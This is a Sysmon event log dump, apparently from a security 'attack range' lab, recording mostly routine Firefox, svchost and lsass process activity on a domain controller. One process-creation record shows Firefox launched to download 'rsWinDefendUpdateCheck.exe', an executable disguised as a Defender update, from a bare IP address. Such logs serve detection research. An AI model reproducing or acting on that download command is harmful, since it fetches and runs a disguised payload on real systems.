12:30:37.851{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\LOCAL\cubeb-pipe-3304-2C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048183Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.833{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048182Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:37.829{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko.3304.5548.14368589512220966718C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000048181Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:37.829{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko.3304.5548.14368589512220966718C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048180Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.828{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045548C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048179Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:37.828{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\chrome.3304.4.93673048C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048178Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.822{FE4C2B44-E66B-63C7-9B06-00000000AF02}33046440C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048177Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:37.822{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko-crash-server-pipe.3304C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000048176Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.802{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\pending_pings\ecd55e0d-f1de-4ab8-a434-31f5dddb6c8eMD5=3677A8A030DA6C58EED75353E5693A2C,SHA256=4650D4E6C2CDD549BB7930F34FC6EDFBB27EB78242F67926F1C6FB6BB07F841E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048175Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.792{FE4C2B44-E66B-63C7-9B06-00000000AF02}33044516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e77459|C:\Program Files\Mozilla Firefox\xul.dll+e7653c|C:\Program Files\Mozilla Firefox\xul.dll+e78bb2|C:\Program Files\Mozilla Firefox\xul.dll+c2d887|C:\Program Files\Mozilla Firefox\xul.dll+c2ac3d|C:\Program Files\Mozilla Firefox\xul.dll+24fe6b|C:\Program Files\Mozilla Firefox\xul.dll+24f993|C:\Program Files\Mozilla Firefox\xul.dll+105ab0f|C:\Program Files\Mozilla Firefox\xul.dll+1882709|C:\Program Files\Mozilla Firefox\xul.dll+1880b50|C:\Program Files\Mozilla Firefox\xul.dll+c2d021|C:\Program Files\Mozilla Firefox\xul.dll+236871|C:\Program Files\Mozilla Firefox\xul.dll+ce82ce|C:\Program Files\Mozilla Firefox\xul.dll+1870580|C:\Program Files\Mozilla Firefox\xul.dll+1822181|C:\Program Files\Mozilla Firefox\xul.dll+1d02fbf|C:\Program Files\Mozilla Firefox\xul.dll+1e7190e|C:\Program Files\Mozilla Firefox\xul.dll+1822568|C:\Program Files\Mozilla Firefox\xul.dll+1d02fbf 10341000x800000000000000048174Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.792{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045548C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048173Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.787{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048172Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.787{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048171Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.787{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048170Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.787{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048169Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.786{FE4C2B44-DDF4-63C7-A004-00000000AF02}47002992C:\Windows\system32\csrss.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000048168Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.785{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045480C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000048167Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.785{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3304.4.936730483\538800233" -childID 3 -isForBrowser -prefsHandle 3928 -prefMapHandle 3912 -prefsLen 31532 -prefMapSize 234522 -jsInitHandle 888 -jsInitLen 246772 -a11yResourceId 64 -parentBuildID 20230112150232 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4fc543a9-2290-4152-9caa-012c56da0ca8} 3304 "\\.\pipe\gecko-crash-server-pipe.3304" 2280 19fba4bb458 tabC:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exe 10341000x800000000000000048166Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.785{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048165Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.784{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048164Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.784{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048163Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.784{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048162Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.783{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048161Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.783{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048160Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.783{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048159Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.783{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048158Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.782{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048157Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.782{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048156Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.782{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla 